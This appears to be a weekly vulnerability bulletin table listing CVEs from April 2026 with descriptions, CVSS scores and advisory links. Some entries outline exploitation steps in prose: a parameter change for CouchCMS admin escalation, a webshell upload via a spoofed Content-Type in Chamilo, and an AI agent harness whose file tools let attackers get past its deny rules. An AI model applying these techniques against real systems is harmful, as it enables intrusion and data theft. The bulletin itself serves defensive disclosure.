| HKUDS--OpenHarness | OpenHarness prior to commit 166fcfe contains an improper access control vulnerability in built-in file tools due to inconsistent parameter handling in permission enforcement, allowing attackers who can influence agent tool execution to read arbitrary local files outside the intended repository scope. Attackers can exploit the path parameter not being passed to the PermissionChecker in read_file, write_file, edit_file, and notebook_edit tools to bypass deny rules and access sensitive files such as configuration files, credentials, and SSH material, or create and overwrite files in restricted host paths in full_auto mode. | 2026-04-07 | 7.1 | CVE-2026-22682 | https://github.com/HKUDS/OpenHarness/pull/32 https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9 https://www.vulncheck.com/advisories/openharness-improper-access-control-via-file-tools |
| VMware--Spring Cloud Gateway | When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead. Note: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0 available on Maven Central https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/ . Ideally, if you are not an enterprise customer, you should upgrade to 5.0.2 or 5.1.1, which are the current supported open source releases. | 2026-04-10 | 7.5 | CVE-2026-22750 | https://spring.io/security/cve-2026-22750 |
| Dell--Elastic Cloud Storage | Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contains an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with privileges of the compromised account. | 2026-04-08 | 7.8 | CVE-2026-28261 | https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability |
| CouchCMS--CouchCMS | CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment. | 2026-04-10 | 7.2 | CVE-2026-29002 | https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1 https://www.couchcms.com/ https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter |
| glpi-project--glpi | GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6. | 2026-04-06 | 7.2 | CVE-2026-29047 | https://github.com/glpi-project/glpi/security/advisories/GHSA-3m49-qf92-vccr |
| open-telemetry--opentelemetry-go | OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify cpu and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0. | 2026-04-07 | 7.5 | CVE-2026-29181 | https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475 |
| Tinyproxy Project--Tinyproxy | Tinyproxy through 1.11.3 is vulnerable to HTTP request parsing desynchronization due to a case-sensitive comparison of the Transfer-Encoding header in src/reqs.c. The is_chunked_transfer() function uses strcmp() to compare the header value against "chunked", even though RFC 7230 specifies that transfer-coding names are case-insensitive. By sending a request with Transfer-Encoding: Chunked, an unauthenticated remote attacker can cause Tinyproxy to misinterpret the request as having no body. In this state, Tinyproxy sets content_length.client to -1, skips pull_client_data_chunked(), forwards request headers upstream, and transitions into relay_connection() raw TCP forwarding while unread body data remains buffered. This leads to inconsistent request state between Tinyproxy and backend servers. RFC-compliant backends (e.g., Node.js, Nginx) will continue waiting for chunked body data, causing connections to hang indefinitely. This behavior enables application-level denial of service through backend worker exhaustion. Additionally, in deployments where Tinyproxy is used for request-body inspection, filtering, or security enforcement, the unread body may be forwarded without proper inspection, resulting in potential security control bypass. | 2026-04-07 | 7.5 | CVE-2026-31842 | Upstream issue report and reproduction details; Tinyproxy upstream project; RFC 7230: transfer-coding names are case-insensitive |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-31940 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9 https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.7 | CVE-2026-31941 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265 https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead |
| chartbrew--chartbrew | Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, "updateAny", "chart") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0. | 2026-04-10 | 7.7 | CVE-2026-32252 | https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1 |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload. | 2026-04-08 | 7.1 | CVE-2026-32589 | https://access.redhat.com/security/cve/CVE-2026-32589 RHBZ#2446963 |
| Red Hat--mirror registry for Red Hat OpenShift | A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server. | 2026-04-08 | 7.1 | CVE-2026-32590 | https://access.redhat.com/security/cve/CVE-2026-32590 RHBZ#2446964 |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVLIB file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvlib file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32860 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVCLASS file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvclass file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32861 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds write in ResFileFactory::InitResourceMgr() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32862 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds read in sentry_transaction_context_set_operation() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32863 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| NI--LabVIEW | There is a memory corruption vulnerability due to an out-of-bounds read in mgcore_SH_25_3!aligned_free() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions. | 2026-04-07 | 7.8 | CVE-2026-32864 | https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-32894 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98 https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151 https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-32930 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6 https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-32931 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4 https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3 |
| aces--Loris | LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections for the MRI feedback popup window of the imaging browser. Attackers can use SQL injection to access/alter data on the server. This vulnerability is fixed in 27.0.3 and 28.0.1. | 2026-04-08 | 7.5 | CVE-2026-33350 | https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh |
| Elastic--Kibana | Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetching full configuration objects and returning them directly, bypassing the authorization checks enforced by the dedicated settings APIs. | 2026-04-08 | 7.7 | CVE-2026-33461 | https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812 |
| distribution--distribution | Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. The realm URL from a bearer challenge is used without validating that it matches the upstream registry host. As a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL. This vulnerability is fixed in 3.1.0. | 2026-04-06 | 7.5 | CVE-2026-33540 | https://github.com/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r |
| themeum--Tutor LMS eLearning and online course solution | The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data->user_id`) without verifying the requester's identity or ownership. Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`. | 2026-04-10 | 7.5 | CVE-2026-3360 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059 https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress - including score, status, completion, and time - without verifying that the requesting user matches the target user ID. Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.1 | CVE-2026-33702 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654 https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 7.1 | CVE-2026-33704 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 7.1 | CVE-2026-33706 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 7.5 | CVE-2026-33710 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rpmg-j327-mr39 https://github.com/chamilo/chamilo-lms/commit/4448701bb8ec557e94ef02d19c72cbe9c49c2d09 https://github.com/chamilo/chamilo-lms/commit/e7400dd840586ae134b286d0a2374f3d269a9a9d |
| saleor--saleor | Saleor is an e-commerce platform. From 2.0.0 to before 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118, Saleor supports query batching by submitting multiple GraphQL operations in a single HTTP request as a JSON array but wasn't enforcing any upper limit on the number of operations. This allowed an unauthenticated attacker to send a single HTTP request containing many operations (bypassing the per-query complexity limit) to exhaust resources. This vulnerability is fixed in 3.23.0a3, 3.22.47, 3.21.54, and 3.20.118. | 2026-04-08 | 7.5 | CVE-2026-33756 | https://github.com/saleor/saleor/security/advisories/GHSA-24jw-f244-qfpp https://github.com/saleor/saleor/commit/7be352fa8c35875d6e66d36493ca7c14c101bd64 https://github.com/saleor/saleor/commit/cdb66da97abb7c86939e384914cd8d9194f378e8 https://github.com/saleor/saleor/commit/d6a94e95bd77f3f733fa66afd1b1ac72e863ca2a https://github.com/saleor/saleor/commit/e42aa4d6e588982e78942b033af051c8ec8f43fa https://github.com/saleor/saleor/commit/f0371bdd4cafcc841f1a9e7049cead6133bf7464 |
| Juniper Networks--CTP OS | A Weak Password Requirements vulnerability in the password management function of Juniper Networks CTP OS might allow an unauthenticated, network-based attacker to exploit weak passwords of local accounts and potentially take full control of the device. The password management menu enables the administrator to set password complexity requirements, but these settings are not saved. The issue can be verified with the menu option "Show password requirements". Failure to enforce the intended requirements can lead to weak passwords being used, which significantly increases the likelihood that an attacker can guess these and subsequently attain unauthorized access. This issue affects CTP OS versions 9.2R1 and 9.2R2. | 2026-04-09 | 7.4 | CVE-2026-33771 | https://kb.juniper.net/JSA107864 |
| Juniper Networks--Junos OS | An Improper Validation of Syntactic Correctness of Input vulnerability in the IPsec library used by kmd and iked of Juniper Networks Junos OS on SRX Series and MX Series allows an unauthenticated, network-based attacker to cause a complete Denial-of-Service (DoS). If an affected device receives a specifically malformed first ISAKMP packet from the initiator, the kmd/iked process will crash and restart, which momentarily prevents new security associations (SAs) from being established. Repeated exploitation of this vulnerability causes a complete inability to establish new VPN connections. This issue affects Junos OS on SRX Series and MX Series: * all versions before 22.4R3-S9, * 23.2 versions before 23.2R2-S6, * 23.4 versions before 23.4R2-S7, * 24.2 versions before 24.2R2-S4, * 24.4 versions before 24.4R2-S3, * 25.2 versions before 25.2R1-S2, 25.2R2. | 2026-04-09 | 7.5 | CVE-2026-33778 | https://kb.juniper.net/JSA107868 |
| Juniper Networks--Junos OS Evolved | A Missing Authentication for Critical Function vulnerability in the Flexible PIC Concentrators (FPCs) of Juniper Networks Junos OS Evolved on PTX Series allows a local, authenticated attacker with low privileges to gain direct access to FPCs installed in the device. A local user with low privileges can gain direct access to the installed FPCs as a high privileged user, which can potentially lead to a full compromise of the affected component. This issue affects Junos OS Evolved on PTX10004, PTX10008, PTX100016, with JNP10K-LC1201 or JNP10K-LC1202: * All versions before 21.2R3-S8-EVO, * 21.4-EVO versions before 21.4R3-S7-EVO, * 22.2-EVO versions before 22.2R3-S4-EVO, * 22.3-EVO versions before 22.3R3-S3-EVO, * 22.4-EVO versions before 22.4R3-S2-EVO, * 23.2-EVO versions before 23.2R2-EVO. | 2026-04-09 | 7.8 | CVE-2026-33788 | https://kb.juniper.net/JSA107806 |
| Juniper Networks--Junos OS | An Improper Check for Unusual or Exceptional Conditions vulnerability in the flow daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an attacker sending a specific, malformed ICMPv6 packet to cause the srxpfe process to crash and restart. Continued receipt and processing of these packets will repeatedly crash the srxpfe process and sustain the Denial of Service (DoS) condition. During NAT64 translation, receipt of a specific, malformed ICMPv6 packet destined to the device will cause the srxpfe process to crash and restart. This issue cannot be triggered using IPv4 nor other IPv6 traffic. This issue affects Junos OS on SRX Series: * all versions before 21.2R3-S10, * all versions of 21.3, * from 21.4 before 21.4R3-S12, * all versions of 22.1, * from 22.2 before 22.2R3-S8, * all versions of 22.4, * from 22.4 before 22.4R3-S9, * from 23.2 before 23.2R2-S6, * from 23.4 before 23.4R2-S7, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S3, * from 25.2 before 25.2R1-S2, 25.2R2. | 2026-04-09 | 7.5 | CVE-2026-33790 | https://kb.juniper.net/JSA107874 |
| Juniper Networks--Junos OS | An Execution with Unnecessary Privileges vulnerability in the User Interface (UI) of Juniper Networks Junos OS and Junos OS Evolved allows a local, low-privileged attacker to gain root privileges, thus compromising the system. When a configuration that allows unsigned Python op scripts is present on the device, a non-root user is able to execute malicious op scripts as a root-equivalent user, leading to privilege escalation. This issue affects Junos OS: * All versions before 22.4R3-S7, * from 23.2 before 23.2R2-S4, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R1-S2, 24.2R2, * from 24.4 before 24.4R1-S2, 24.4R2; Junos OS Evolved: * All versions before 22.4R3-S7-EVO, * from 23.2 before 23.2R2-S4-EVO, * from 23.4 before 23.4R2-S6-EVO, * from 24.2 before 24.2R2-EVO, * from 24.4 before 24.4R1-S1-EVO, 24.4R2-EVO. | 2026-04-09 | 7.8 | CVE-2026-33793 | https://kb.juniper.net/JSA103142 |
| Juniper Networks--Junos OS | An Improper Input Validation vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker, sending a specific genuine BGP packet in an already established BGP session, to reset only that session, causing a Denial of Service (DoS). An attacker repeatedly sending the packet will sustain the Denial of Service (DoS). This issue affects Junos OS: * 25.2 versions before 25.2R2. This issue does not affect Junos OS versions before 25.2R1. This issue affects Junos OS Evolved: * 25.2-EVO versions before 25.2R2-EVO. This issue does not affect Junos OS Evolved versions before 25.2R1-EVO. eBGP and iBGP are affected. IPv4 and IPv6 are affected. | 2026-04-09 | 7.4 | CVE-2026-33797 | https://kb.juniper.net/JSA107850 |
| shamimmoeen--WCAPF Ajax Product Filter for WooCommerce | WCAPF - WooCommerce Ajax Product Filter plugin is vulnerable to time-based SQL Injection via the 'post-author' parameter in all versions up to, and including, 4.2.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-04-08 | 7.5 | CVE-2026-3396 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0a762e-9159-4dab-a7be-9cbe332effb1?source=cve https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L739 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L689 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L81 https://plugins.trac.wordpress.org/browser/wc-ajax-product-filter/trunk/includes/class-wcapf-product-filter.php#L65 https://plugins.trac.wordpress.org/changeset/3484080/ |
| @fedify--fedify | Fedify is a TypeScript library for building federated server apps powered by ActivityPub. Prior to 1.9.6, 1.10.5, 2.0.8, and 2.1.1, @fedify/fedify follows HTTP redirects recursively in its remote document loader and authenticated document loader without enforcing a maximum redirect count or visited-URL loop detection. An attacker who controls a remote ActivityPub key or actor URL can force a server using Fedify to make repeated outbound requests from a single inbound request, leading to resource consumption and denial of service. This vulnerability is fixed in 1.9.6, 1.10.5, 2.0.8, and 2.1.1. | 2026-04-06 | 7.5 | CVE-2026-34148 | https://github.com/fedify-dev/fedify/security/advisories/GHSA-gm9m-gwc4-hwgp https://github.com/fedify-dev/fedify/releases/tag/1.10.5 https://github.com/fedify-dev/fedify/releases/tag/1.9.6 https://github.com/fedify-dev/fedify/releases/tag/2.0.8 https://github.com/fedify-dev/fedify/releases/tag/2.1.1 |
| AcademySoftwareFoundation--openexr | OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, a misaligned memory write vulnerability exists in LossyDctDecoder_execute() in src/lib/OpenEXRCore/internal_dwa_decoder.h:749. When decoding a DWA or DWAB-compressed EXR file containing a FLOAT-type channel, the decoder performs an in-place HALF→FLOAT conversion by casting an unaligned uint8_t * row pointer to float * and writing through it. Because the row buffer may not be 4-byte aligned, this constitutes undefined behavior under the C standard and crashes immediately on architectures that enforce alignment (ARM, RISC-V, etc.). On x86 it is silently tolerated at runtime but remains exploitable via compiler optimizations that assume aligned access. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9. | 2026-04-06 | 7.1 | CVE-2026-34379 | https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-w88v-vqhq-5p24 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9 https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9 |
| aces--Loris | LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data- and project-management for neuroimaging research. From 20.0.0 to before 27.0.3 and 28.0.1, a bug in the static file router can allow an attacker to traverse outside of the intended directory, allowing unintended files to be downloaded through the static, css, and js endpoints. This vulnerability is fixed in 27.0.3 and 28.0.1. | 2026-04-08 | 7.5 | CVE-2026-34392 | https://github.com/aces/Loris/security/advisories/GHSA-rfj5-58hv-wc5f |
| go-vikunja--vikunja | Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, the OIDC callback handler issues a full JWT token without checking whether the matched user has TOTP two-factor authentication enabled. When a local user with TOTP enrolled is matched via the OIDC email fallback mechanism, the second factor is completely skipped. This vulnerability is fixed in 2.3.0. | 2026-04-10 | 7.4 | CVE-2026-34727 | https://github.com/go-vikunja/vikunja/security/advisories/GHSA-8jvc-mcx6-r4cg |
| HDFGroup--hdf5 | HDF5 is software for managing data. In 1.14.1-2 and earlier, a heap-use-after-free was found in the h5dump helper utility. An attacker who can supply a malicious h5 file can trigger a heap use-after-free. The freed object is referenced in a memmove call from H5T__conv_struct. The original object was allocated by H5D__typeinfo_init_phase3 and freed by H5D__typeinfo_term. | 2026-04-09 | 7.8 | CVE-2026-34734 | https://github.com/HDFGroup/hdf5/security/advisories/GHSA-w7v2-9cmr-pwwj |
| Analytify--Under Construction, Coming Soon & Maintenance Mode | Cross-Site Request Forgery (CSRF) vulnerability in Analytify Under Construction, Coming Soon & Maintenance Mode allows Cross-Site Request Forgery. This issue affects Under Construction, Coming Soon & Maintenance Mode: from n/a through 2.1.1. | 2026-04-07 | 7.5 | CVE-2026-34896 | https://patchstack.com/database/wordpress/plugin/under-construction-maintenance-mode/vulnerability/wordpress-under-construction-coming-soon-maintenance-mode-plugin-2-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Analytify--Simple Social Media Share Buttons | Cross-Site Request Forgery (CSRF) vulnerability in Analytify Simple Social Media Share Buttons allows Cross-Site Request Forgery. This issue affects Simple Social Media Share Buttons: from n/a through 6.2.0. | 2026-04-07 | 7.5 | CVE-2026-34904 | https://patchstack.com/database/wordpress/plugin/simple-social-buttons/vulnerability/wordpress-simple-social-media-share-buttons-plugin-6-2-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Dynalon--MDwiki | MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context. | 2026-04-12 | 6.1 | CVE-2017-20239 | ExploitDB-46097 VulnCheck Advisory: MDwiki Cross-Site Scripting via Location Hash Parameter |
| NSauditor--SpotFTP Password Recover | SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code. | 2026-04-12 | 6.2 | CVE-2019-25711 | ExploitDB-46088 VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Name Field |
| NSauditor--BlueAuditor | BlueAuditor 1.7.2.0 contains a buffer overflow vulnerability in the registration key field that allows local attackers to crash the application by submitting an oversized key value. Attackers can trigger a denial of service by entering a 256-byte buffer of repeated characters in the Key registration field, causing the application to crash during registration processing. | 2026-04-12 | 6.2 | CVE-2019-25712 | ExploitDB-46087 VulnCheck Advisory: BlueAuditor 1.7.2.0 Buffer Overflow Denial of Service via Registration Key |
